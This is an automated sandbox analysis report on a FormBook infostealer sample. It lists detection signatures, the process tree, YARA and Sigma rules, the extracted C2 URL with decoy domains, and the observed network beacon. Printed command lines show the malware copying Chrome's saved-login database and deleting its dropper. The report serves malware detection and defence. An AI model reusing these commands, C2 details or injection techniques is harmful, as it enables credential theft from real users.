Play interactive tour

Edit tour

Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Sample Name:	f97e137e_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:	403818
MD5:	f97e137e249bb393fd88b7dec1ddf9a2
SHA1:	09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256:	2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Benign windows process drops PE files

Detected FormBook malware

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: System File Execution Location Anomaly

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses ipconfig to lookup or modify the Windows network settings

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

f97e137e_by_Libranalysis.exe (PID: 6944 cmdline: 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe' MD5: F97E137E249BB393FD88B7DEC1DDF9A2)

secinit.exe (PID: 4112 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

ipconfig.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 5544 cmdline: /c del 'C:\Windows\SysWOW64\secinit.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vp21b7dsh.exe (PID: 2188 cmdline: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe MD5: 174A363BB5A2D88B224546C15DD10906)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.secinit.exe.10410000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.secinit.exe.10410000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.secinit.exe.10410000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17649:$sqlite3step: 68 34 1C 7B E1 0x1775c:$sqlite3step: 68 34 1C 7B E1 0x17678:$sqlite3text: 68 38 2A 90 C5 0x1779d:$sqlite3text: 68 38 2A 90 C5 0x1768b:$sqlite3blob: 68 53 D8 7F 8C 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.secinit.exe.10410000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.secinit.exe.10410000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.secinit.exe.10410000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\secinit.exe, ParentImage: C:\Windows\SysWOW64\secinit.exe, ParentProcessId: 4112, ProcessCommandLine: , ProcessId: 3424

Stealing of Sensitive Information:

Sigma detected: Steal Google chrome login data

Show sources

Source: Process started

Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\ipconfig.exe, ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 1904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: f97e137e_by_Libranalysis.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: www.joomlas123.info	Virustotal: Detection: 10%			Perma Link
Source: www.joomlas123.info/3nop/	Virustotal: Detection: 13%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: f97e137e_by_Libranalysis.exe	Virustotal: Detection: 26%			Perma Link
Source: f97e137e_by_Libranalysis.exe	ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Source: 2.2.secinit.exe.10410000.5.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: f97e137e_by_Libranalysis.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:	Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
Source:	Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
Source:	Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.joomlas123.info/3nop/

Source: global traffic

HTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1Host: www.joomlas123.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 199.192.24.139 199.192.24.139
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 10:34:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
